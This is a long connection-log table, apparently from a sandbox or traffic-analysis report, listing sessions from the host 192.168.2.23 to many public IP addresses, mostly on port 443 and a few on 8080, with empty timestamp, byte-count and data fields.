                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14820192.168.2.235960070.243.76.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14821192.168.2.2357830189.88.4.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14822192.168.2.2333422177.42.11.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14823192.168.2.2346636219.245.80.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14824192.168.2.2349680184.92.100.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14825192.168.2.2350716147.23.104.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14826192.168.2.23606221.7.236.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14827192.168.2.2346144149.146.75.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14828192.168.2.233728819.113.216.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14829192.168.2.2355172195.169.25.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14830192.168.2.2351286132.202.163.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14831192.168.2.235814613.133.23.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14832192.168.2.233715260.129.74.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14833192.168.2.2360966218.24.121.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14834192.168.2.2353372139.137.201.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14835192.168.2.235920644.91.110.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14836192.168.2.2345068143.247.18.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14837192.168.2.2354052164.103.131.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14838192.168.2.234566025.15.255.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14839192.168.2.2341716213.211.170.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14840192.168.2.233716685.153.168.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14841192.168.2.2347694150.75.172.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14842192.168.2.234369447.102.103.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14843192.168.2.2350000158.21.75.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14844192.168.2.2349118109.33.161.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14845192.168.2.23369121.238.252.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14846192.168.2.2343760211.195.247.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14847192.168.2.2358264171.209.15.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14848192.168.2.2340256206.152.3.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14849192.168.2.23460864.90.118.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14850192.168.2.2346202170.124.85.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14851192.168.2.2345030173.238.98.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14852192.168.2.234625232.53.198.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14853192.168.2.234216020.159.74.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14854192.168.2.2349532105.181.20.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14855192.168.2.234858874.15.204.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14856192.168.2.2358030196.160.174.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14857192.168.2.2340172104.147.40.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14858192.168.2.2334100175.17.227.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14859192.168.2.2355040142.162.43.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14860192.168.2.233499464.90.223.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14861192.168.2.2337504223.54.237.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14862192.168.2.2335634167.145.12.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14863192.168.2.233336823.249.149.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14864192.168.2.235908812.110.229.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14865192.168.2.2340042121.221.89.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14866192.168.2.2347704134.134.117.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14867192.168.2.2356462198.240.89.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14868192.168.2.2344368195.35.122.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14869192.168.2.233421261.49.38.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14870192.168.2.235695286.53.168.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14871192.168.2.2346086184.30.211.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14872192.168.2.2338158102.85.164.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14873192.168.2.234538443.115.206.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14874192.168.2.2349182160.173.205.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14875192.168.2.2356148109.66.89.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14876192.168.2.2338214119.171.210.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14877192.168.2.2341502141.67.255.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14878192.168.2.2349008149.71.57.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14879192.168.2.2352092133.242.64.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14880192.168.2.2351922205.174.148.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14881192.168.2.2347336223.219.179.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14882192.168.2.2346012129.73.213.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14883192.168.2.2354894189.83.142.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14884192.168.2.235611871.110.147.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14885192.168.2.235006077.103.182.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14886192.168.2.234095046.66.144.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14887192.168.2.2358046152.39.115.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14888192.168.2.235423851.237.2.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14889192.168.2.2346226180.17.67.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14890192.168.2.234231241.159.205.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14891192.168.2.2359678169.180.163.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14892192.168.2.235470442.86.150.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14893192.168.2.2356246116.159.184.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14894192.168.2.234594652.35.251.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14895192.168.2.2342758200.117.120.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14896192.168.2.235720272.186.53.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14897192.168.2.235650858.152.145.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14898192.168.2.2342826119.248.205.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14899192.168.2.2343710123.102.152.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14900192.168.2.234634619.129.146.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14901192.168.2.2336752144.222.230.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14902192.168.2.2356142182.79.11.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14903192.168.2.235165678.208.243.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14904192.168.2.233672896.163.147.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14905192.168.2.2346936139.231.246.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14906192.168.2.234672831.44.120.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14907192.168.2.2339978163.237.165.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14908192.168.2.234623835.204.204.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14909192.168.2.234212437.244.217.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14910192.168.2.2333906173.125.246.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14911192.168.2.2352726166.47.248.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14912192.168.2.2333304187.178.137.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14913192.168.2.2353058197.43.10.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14914192.168.2.2350696133.167.60.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14915192.168.2.234280640.199.16.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14916192.168.2.2341172174.181.74.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14917192.168.2.235384443.200.154.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14918192.168.2.2337690124.2.209.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14919192.168.2.2336150184.209.250.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14920192.168.2.2360672162.234.162.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14921192.168.2.235961665.133.41.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14922192.168.2.2350802203.205.21.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14923192.168.2.235217071.109.125.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14924192.168.2.2333800182.240.15.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14925192.168.2.2344468164.214.249.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14926192.168.2.233744214.212.128.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14927192.168.2.2337502136.47.241.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14928192.168.2.234369817.136.109.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14929192.168.2.233428860.111.223.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14930192.168.2.2346278119.8.188.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14931192.168.2.2344714165.43.116.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14932192.168.2.235068459.18.1.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14933192.168.2.2334578162.172.231.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14934192.168.2.2349496167.212.210.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14935192.168.2.2348074180.205.212.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14936192.168.2.2341684117.84.24.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14937192.168.2.2349064119.182.139.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14938192.168.2.235948614.158.246.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14939192.168.2.2353286109.213.96.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14940192.168.2.2358160176.16.84.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14941192.168.2.2348202104.178.178.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14942192.168.2.2341750187.224.211.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14943192.168.2.234789470.19.41.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14944192.168.2.235842298.210.101.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14945192.168.2.234787627.21.42.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14946192.168.2.2348616196.148.10.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14947192.168.2.2337186140.113.77.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14948192.168.2.2354682207.160.57.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14949192.168.2.2349368104.240.76.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14950192.168.2.2339152140.169.80.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14951192.168.2.233330062.241.52.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14952192.168.2.2349122217.255.34.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14953192.168.2.233876820.238.189.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14954192.168.2.235266267.241.119.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14955192.168.2.2341506132.120.14.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14956192.168.2.2345396181.98.48.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14957192.168.2.2356544213.193.38.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14958192.168.2.2334998140.199.44.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14959192.168.2.2349464172.126.202.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14960192.168.2.235398470.201.182.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14961192.168.2.2343694118.17.119.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14962192.168.2.2342800204.106.225.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14963192.168.2.234695464.96.209.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14964192.168.2.2351146209.184.188.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14965192.168.2.234088812.193.104.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14966192.168.2.235614499.195.96.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14967192.168.2.235594464.233.152.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14968192.168.2.235338623.174.38.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14969192.168.2.2350028115.215.213.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14970192.168.2.2348072182.74.84.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14971192.168.2.234918490.3.59.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14972192.168.2.2345844106.207.137.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14973192.168.2.2333468169.175.11.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14974192.168.2.2341600207.40.93.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14975192.168.2.235645275.54.98.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14976192.168.2.2352696193.154.229.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14977192.168.2.233681063.142.144.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14978192.168.2.235152051.50.126.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14979192.168.2.233565683.96.231.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14980192.168.2.2338208167.153.171.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14981192.168.2.2359218173.52.75.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14982192.168.2.2359166157.48.140.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14983192.168.2.2346554115.252.220.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14984192.168.2.234087095.94.61.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14985192.168.2.234603482.206.116.738080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14986192.168.2.234384690.85.39.2148080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14987192.168.2.234979234.144.206.278080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14988192.168.2.235263492.119.15.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14989192.168.2.2340612209.100.32.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14990192.168.2.2359366196.118.119.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14991192.168.2.235390852.176.251.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14992192.168.2.2359886138.114.102.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14993192.168.2.2356042199.157.188.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14994192.168.2.234704831.22.99.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14995192.168.2.235786442.189.193.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14996192.168.2.2349516208.213.91.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14997192.168.2.2355698105.171.249.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14998192.168.2.2341944211.120.198.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14999192.168.2.234120477.226.122.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15000192.168.2.2351970177.85.233.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15001192.168.2.2348276211.19.219.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15002192.168.2.2344982169.164.176.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15003192.168.2.233405899.7.130.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15004192.168.2.2343722209.147.52.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15005192.168.2.2335916223.210.172.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15006192.168.2.235645843.82.93.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15007192.168.2.234580635.2.165.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15008192.168.2.2338416179.167.188.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15009192.168.2.2350106136.245.18.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15010192.168.2.2342752133.22.102.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15011192.168.2.2343870111.95.50.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15012192.168.2.235399646.205.122.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15013192.168.2.2354666177.69.117.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15014192.168.2.234957692.132.253.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15015192.168.2.2358028145.175.1.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15016192.168.2.2345180151.217.40.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15017192.168.2.2334194199.203.15.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15018192.168.2.234542838.118.104.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15019192.168.2.2357426106.2.0.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15020192.168.2.2354920141.223.70.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15021192.168.2.236048251.11.191.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15022192.168.2.234986475.163.207.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15023192.168.2.2356208147.144.164.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15024192.168.2.2336680117.197.110.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15025192.168.2.2334484208.190.225.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15026192.168.2.2339498192.81.156.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15027192.168.2.2342536206.156.155.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15028192.168.2.2351504211.246.111.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15029192.168.2.2343138121.142.236.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15030192.168.2.235808280.221.158.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15031192.168.2.2344118100.178.126.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15032192.168.2.2338622138.46.168.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15033192.168.2.2338724124.62.25.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15034192.168.2.234988023.148.31.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15035192.168.2.2342376173.104.247.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15036192.168.2.235110824.95.94.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15037192.168.2.2334448184.203.94.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15038192.168.2.234590873.191.13.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15039192.168.2.2343296150.215.62.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15040192.168.2.2340620213.20.209.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15041192.168.2.2348358192.68.58.157443
